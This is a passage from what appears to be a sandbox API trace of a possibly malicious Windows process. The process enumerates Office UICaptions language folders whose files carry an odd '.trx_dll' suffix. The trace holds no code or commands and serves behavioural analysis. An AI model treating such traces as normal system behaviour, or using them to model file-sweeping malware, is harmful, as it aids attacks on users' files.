lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf706700, ftCreationTime.dwHighDateTime=0x1cac81a, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbf706700, ftLastWriteTime.dwHighDateTime=0x1cac81a, nFileSizeHigh=0x0, nFileSizeLow=0x6960, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISBRRES.DLL.trx_dll", cAlternateFileName="VISBRR~1.TRX")) returned 1 [0211.527] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a315700, ftCreationTime.dwHighDateTime=0x1cac814, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6a315700, ftLastWriteTime.dwHighDateTime=0x1cac814, nFileSizeHigh=0x0, nFileSizeLow=0x77560, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISINTL.DLL.trx_dll", cAlternateFileName="VISINT~1.TRX")) returned 1 [0211.528] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb31c100, ftCreationTime.dwHighDateTime=0x1cacd25, ftLastAccessTime.dwLowDateTime=0xef0ca650, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xcb31c100, ftLastWriteTime.dwHighDateTime=0x1cacd25, nFileSizeHigh=0x0, nFileSizeLow=0x25b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="WWINTL.DLL.trx_dll", cAlternateFileName="WWINTL~1.TRX")) returned 1 [0211.528] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb31c100, ftCreationTime.dwHighDateTime=0x1cacd25, ftLastAccessTime.dwLowDateTime=0xef0f07b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xcb31c100, ftLastWriteTime.dwHighDateTime=0x1cacd25, nFileSizeHigh=0x0, nFileSizeLow=0x115b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="WWINTL.REST.trx_dll", cAlternateFileName="WWINTL~2.TRX")) returned 1 [0211.528] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6b688100, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef0f07b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6b688100, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x25360, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLINTL32.DLL.trx_dll", cAlternateFileName="XLINTL~1.TRX")) returned 1 [0211.528] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a375400, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6a375400, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x137960, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLINTL32.REST.trx_dll", cAlternateFileName="XLINTL~2.TRX")) returned 1 [0211.528] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfe092000, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe092000, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x3d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSLICER.DLL.trx_dll", cAlternateFileName="XLSLIC~1.TRX")) returned 1 [0211.529] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0211.529] FindClose (in: hFindFile=0xb7fb10 | out: hFindFile=0xb7fb10) returned 1 [0211.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f34c) returned 1 [0211.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f358) returned 1 [0211.530] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f38c) returned 1 [0211.530] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036", nBufferLength=0x105, lpBuffer=0x691ee94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036", lpFilePart=0x0) returned 0x2f [0211.530] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\", nBufferLength=0x105, lpBuffer=0x691ee68, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpFilePart=0x0) returned 0x30 [0211.530] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\*", lpFindFileData=0x691f0b4 | out: lpFindFileData=0x691f0b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fb10 [0211.531] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0211.532] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1be9a700, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1be9a700, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x3960, dwReserved0=0x0, dwReserved1=0x0, cFileName="ENVELOPR.DLL.trx_dll", cAlternateFileName="ENVELO~1.TRX")) returned 1 [0211.532] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd48e100, ftCreationTime.dwHighDateTime=0x1cac7f7, ftLastAccessTime.dwLowDateTime=0xeedf6c30, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbd48e100, ftLastWriteTime.dwHighDateTime=0x1cac7f7, nFileSizeHigh=0x0, nFileSizeLow=0xbf60, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRINTL32.DLL.trx_dll", cAlternateFileName="GRINTL~1.TRX")) returned 1 [0211.532] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd48e100, ftCreationTime.dwHighDateTime=0x1cac7f7, ftLastAccessTime.dwLowDateTime=0xeedf6c30, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbd48e100, ftLastWriteTime.dwHighDateTime=0x1cac7f7, nFileSizeHigh=0x0, nFileSizeLow=0x3d960, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRINTL32.REST.trx_dll", cAlternateFileName="GRINTL~2.TRX")) returned 1 [0211.532] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1be9a700, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1be9a700, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x49f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="MAPIR.DLL.trx_dll", cAlternateFileName="MAPIRD~1.TRX")) returned 1 [0211.533] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa27f6800, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa27f6800, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0xc160, dwReserved0=0x0, dwReserved1=0x0, cFileName="MOR6INT.REST.trx_dll", cAlternateFileName="MOR6IN~1.TRX")) returned 1 [0211.533] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9f53ca00, ftCreationTime.dwHighDateTime=0x1caca0b, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x9f53ca00, ftLastWriteTime.dwHighDateTime=0x1caca0b, nFileSizeHigh=0x0, nFileSizeLow=0x17960, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOINTL.DLL.trx_dll", cAlternateFileName="MSOINT~1.TRX")) returned 1 [0211.533] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9f53ca00, ftCreationTime.dwHighDateTime=0x1caca0b, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x9f53ca00, ftLastWriteTime.dwHighDateTime=0x1caca0b, nFileSizeHigh=0x0, nFileSizeLow=0x2ced60, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOINTL.REST.trx_dll", cAlternateFileName="MSOINT~2.TRX")) returned 1 [0211.533] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa381000, ftCreationTime.dwHighDateTime=0x1cac7fb, ftLastAccessTime.dwLowDateTime=0xeef27730, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xaa381000, ftLastWriteTime.dwHighDateTime=0x1cac7fb, nFileSizeHigh=0x0, nFileSizeLow=0xb360, dwReserved0=0x0, dwReserved1=0x0, cFileName="OMSINTL.DLL.trx_dll", cAlternateFileName="OMSINT~1.TRX")) returned 1 [0211.534] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7337cc00, ftCreationTime.dwHighDateTime=0x1cacf6a, ftLastAccessTime.dwLowDateTime=0xeef27730, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7337cc00, ftLastWriteTime.dwHighDateTime=0x1cacf6a, nFileSizeHigh=0x0, nFileSizeLow=0x7b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="ONINTL.DLL.trx_dll", cAlternateFileName="ONINTL~1.TRX")) returned 1 [0211.534] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7337cc00, ftCreationTime.dwHighDateTime=0x1cacf6a, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7337cc00, ftLastWriteTime.dwHighDateTime=0x1cacf6a, nFileSizeHigh=0x0, nFileSizeLow=0x3fb60, dwReserved0=0x0, dwReserved1=0x0, cFileName="ONINTL.REST.trx_dll", cAlternateFileName="ONINTL~2.TRX")) returned 1 [0211.534] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ab87a00, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1ab87a00, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x37560, dwReserved0=0x0, dwReserved1=0x0, cFileName="OUTLLIBR.DLL.trx_dll", cAlternateFileName="OUTLLI~1.TRX")) returned 1 [0211.534] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ab87a00, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef739f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1ab87a00, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0xa6560, dwReserved0=0x0, dwReserved1=0x0, cFileName="OUTLLIBR.REST.trx_dll", cAlternateFileName="OUTLLI~2.TRX")) returned 1 [0211.534] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1be9a700, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef739f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1be9a700, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x2b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="OUTLWVW.DLL.trx_dll", cAlternateFileName="OUTLWV~1.TRX")) returned 1 [0211.535] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cef6000, ftCreationTime.dwHighDateTime=0x1cac803, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7cef6000, ftLastWriteTime.dwHighDateTime=0x1cac803, nFileSizeHigh=0x0, nFileSizeLow=0xcd60, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPINTL.DLL.trx_dll", cAlternateFileName="PPINTL~1.TRX")) returned 1 [0211.535] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cef6000, ftCreationTime.dwHighDateTime=0x1cac803, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7cef6000, ftLastWriteTime.dwHighDateTime=0x1cac803, nFileSizeHigh=0x0, nFileSizeLow=0x45f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPINTL.REST.trx_dll", cAlternateFileName="PPINTL~2.TRX")) returned 1 [0211.535] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3b09500, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa3b09500, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0x1a360, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUB6INTL.DLL.trx_dll", cAlternateFileName="PUB6IN~1.TRX")) returned 1 [0211.535] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa27f6800, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa27f6800, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0x8e160, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUB6INTL.REST.trx_dll", cAlternateFileName="PUB6IN~2.TRX")) returned 1 [0211.536] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x749d2200, ftCreationTime.dwHighDateTime=0x1cac80f, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x749d2200, ftLastWriteTime.dwHighDateTime=0x1cac80f, nFileSizeHigh=0x0, nFileSizeLow=0x5ab60, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUBWZINT.REST.trx_dll", cAlternateFileName="PUBWZI~1.TRX")) returned 1 [0211.536] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6d7a1200, ftCreationTime.dwHighDateTime=0x1cac817, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6d7a1200, ftLastWriteTime.dwHighDateTime=0x1cac817, nFileSizeHigh=0x0, nFileSizeLow=0x3360, dwReserved0=0x0, dwReserved1=0x0, cFileName="SGRES.DLL.trx_dll", cAlternateFileName="SGRESD~1.TRX")) returned 1 [0211.536] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc8e7d800, ftCreationTime.dwHighDateTime=0x1cac7f6, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xc8e7d800, ftLastWriteTime.dwHighDateTime=0x1cac7f6, nFileSizeHigh=0x0, nFileSizeLow=0x4160, dwReserved0=0x0, dwReserved1=0x0, cFileName="STINTL.DLL.trx_dll", cAlternateFileName="STINTL~1.TRX")) returned 1 [0211.536] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf706700, ftCreationTime.dwHighDateTime=0x1cac81a, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbf706700, ftLastWriteTime.dwHighDateTime=0x1cac81a, nFileSizeHigh=0x0, nFileSizeLow=0x6960, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISBRRES.DLL.trx_dll", cAlternateFileName="VISBRR~1.TRX")) returned 1 [0211.536] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a315700, ftCreationTime.dwHighDateTime=0x1cac814, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6a315700, ftLastWriteTime.dwHighDateTime=0x1cac814, nFileSizeHigh=0x0, nFileSizeLow=0x77560, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISINTL.DLL.trx_dll", cAlternateFileName="VISINT~1.TRX")) returned 1 [0211.537] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb31c100, ftCreationTime.dwHighDateTime=0x1cacd25, ftLastAccessTime.dwLowDateTime=0xef0ca650, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xcb31c100, ftLastWriteTime.dwHighDateTime=0x1cacd25, nFileSizeHigh=0x0, nFileSizeLow=0x25b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="WWINTL.DLL.trx_dll", cAlternateFileName="WWINTL~1.TRX")) returned 1 [0211.537] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb31c100, ftCreationTime.dwHighDateTime=0x1cacd25, ftLastAccessTime.dwLowDateTime=0xef0f07b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xcb31c100, ftLastWriteTime.dwHighDateTime=0x1cacd25, nFileSizeHigh=0x0, nFileSizeLow=0x115b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="WWINTL.REST.trx_dll", cAlternateFileName="WWINTL~2.TRX")) returned 1 [0211.537] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6b688100, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef0f07b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6b688100, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x25360, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLINTL32.DLL.trx_dll", cAlternateFileName="XLINTL~1.TRX")) returned 1 [0211.537] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a375400, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6a375400, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x137960, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLINTL32.REST.trx_dll", cAlternateFileName="XLINTL~2.TRX")) returned 1 [0211.539] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfe092000, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe092000, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x3d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSLICER.DLL.trx_dll", cAlternateFileName="XLSLIC~1.TRX")) returned 1 [0211.539] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfe092000, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe092000, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x3d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSLICER.DLL.trx_dll", cAlternateFileName="XLSLIC~1.TRX")) returned 0 [0211.540] FindClose (in: hFindFile=0xb7fb10 | out: hFindFile=0xb7fb10) returned 1 [0211.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f34c) returned 1 [0211.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f358) returned 1 [0211.542] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f38c) returned 1 [0211.542] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082", nBufferLength=0x105, lpBuffer=0x691ee94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082", lpFilePart=0x0) returned 0x2f [0211.542] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\", nBufferLength=0x105, lpBuffer=0x691ee68, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpFilePart=0x0) returned 0x30 [0211.542] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\*", lpFindFileData=0x691f0b4 | out: lpFindFileData=0x691f0b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f0d0 [0211.953] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0212.256] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302da400, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x302da400, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x3760, dwReserved0=0x0, dwReserved1=0x0, cFileName="ENVELOPR.DLL.trx_dll", cAlternateFileName="ENVELO~1.TRX")) returned 1 [0212.256] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74912800, ftCreationTime.dwHighDateTime=0x1cac7f7, ftLastAccessTime.dwLowDateTime=0xeedf6c30, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x74912800, ftLastWriteTime.dwHighDateTime=0x1cac7f7, nFileSizeHigh=0x0, nFileSizeLow=0xb960, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRINTL32.DLL.trx_dll", cAlternateFileName="GRINTL~1.TRX")) returned 1 [0212.257] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x691f0c4 | out: 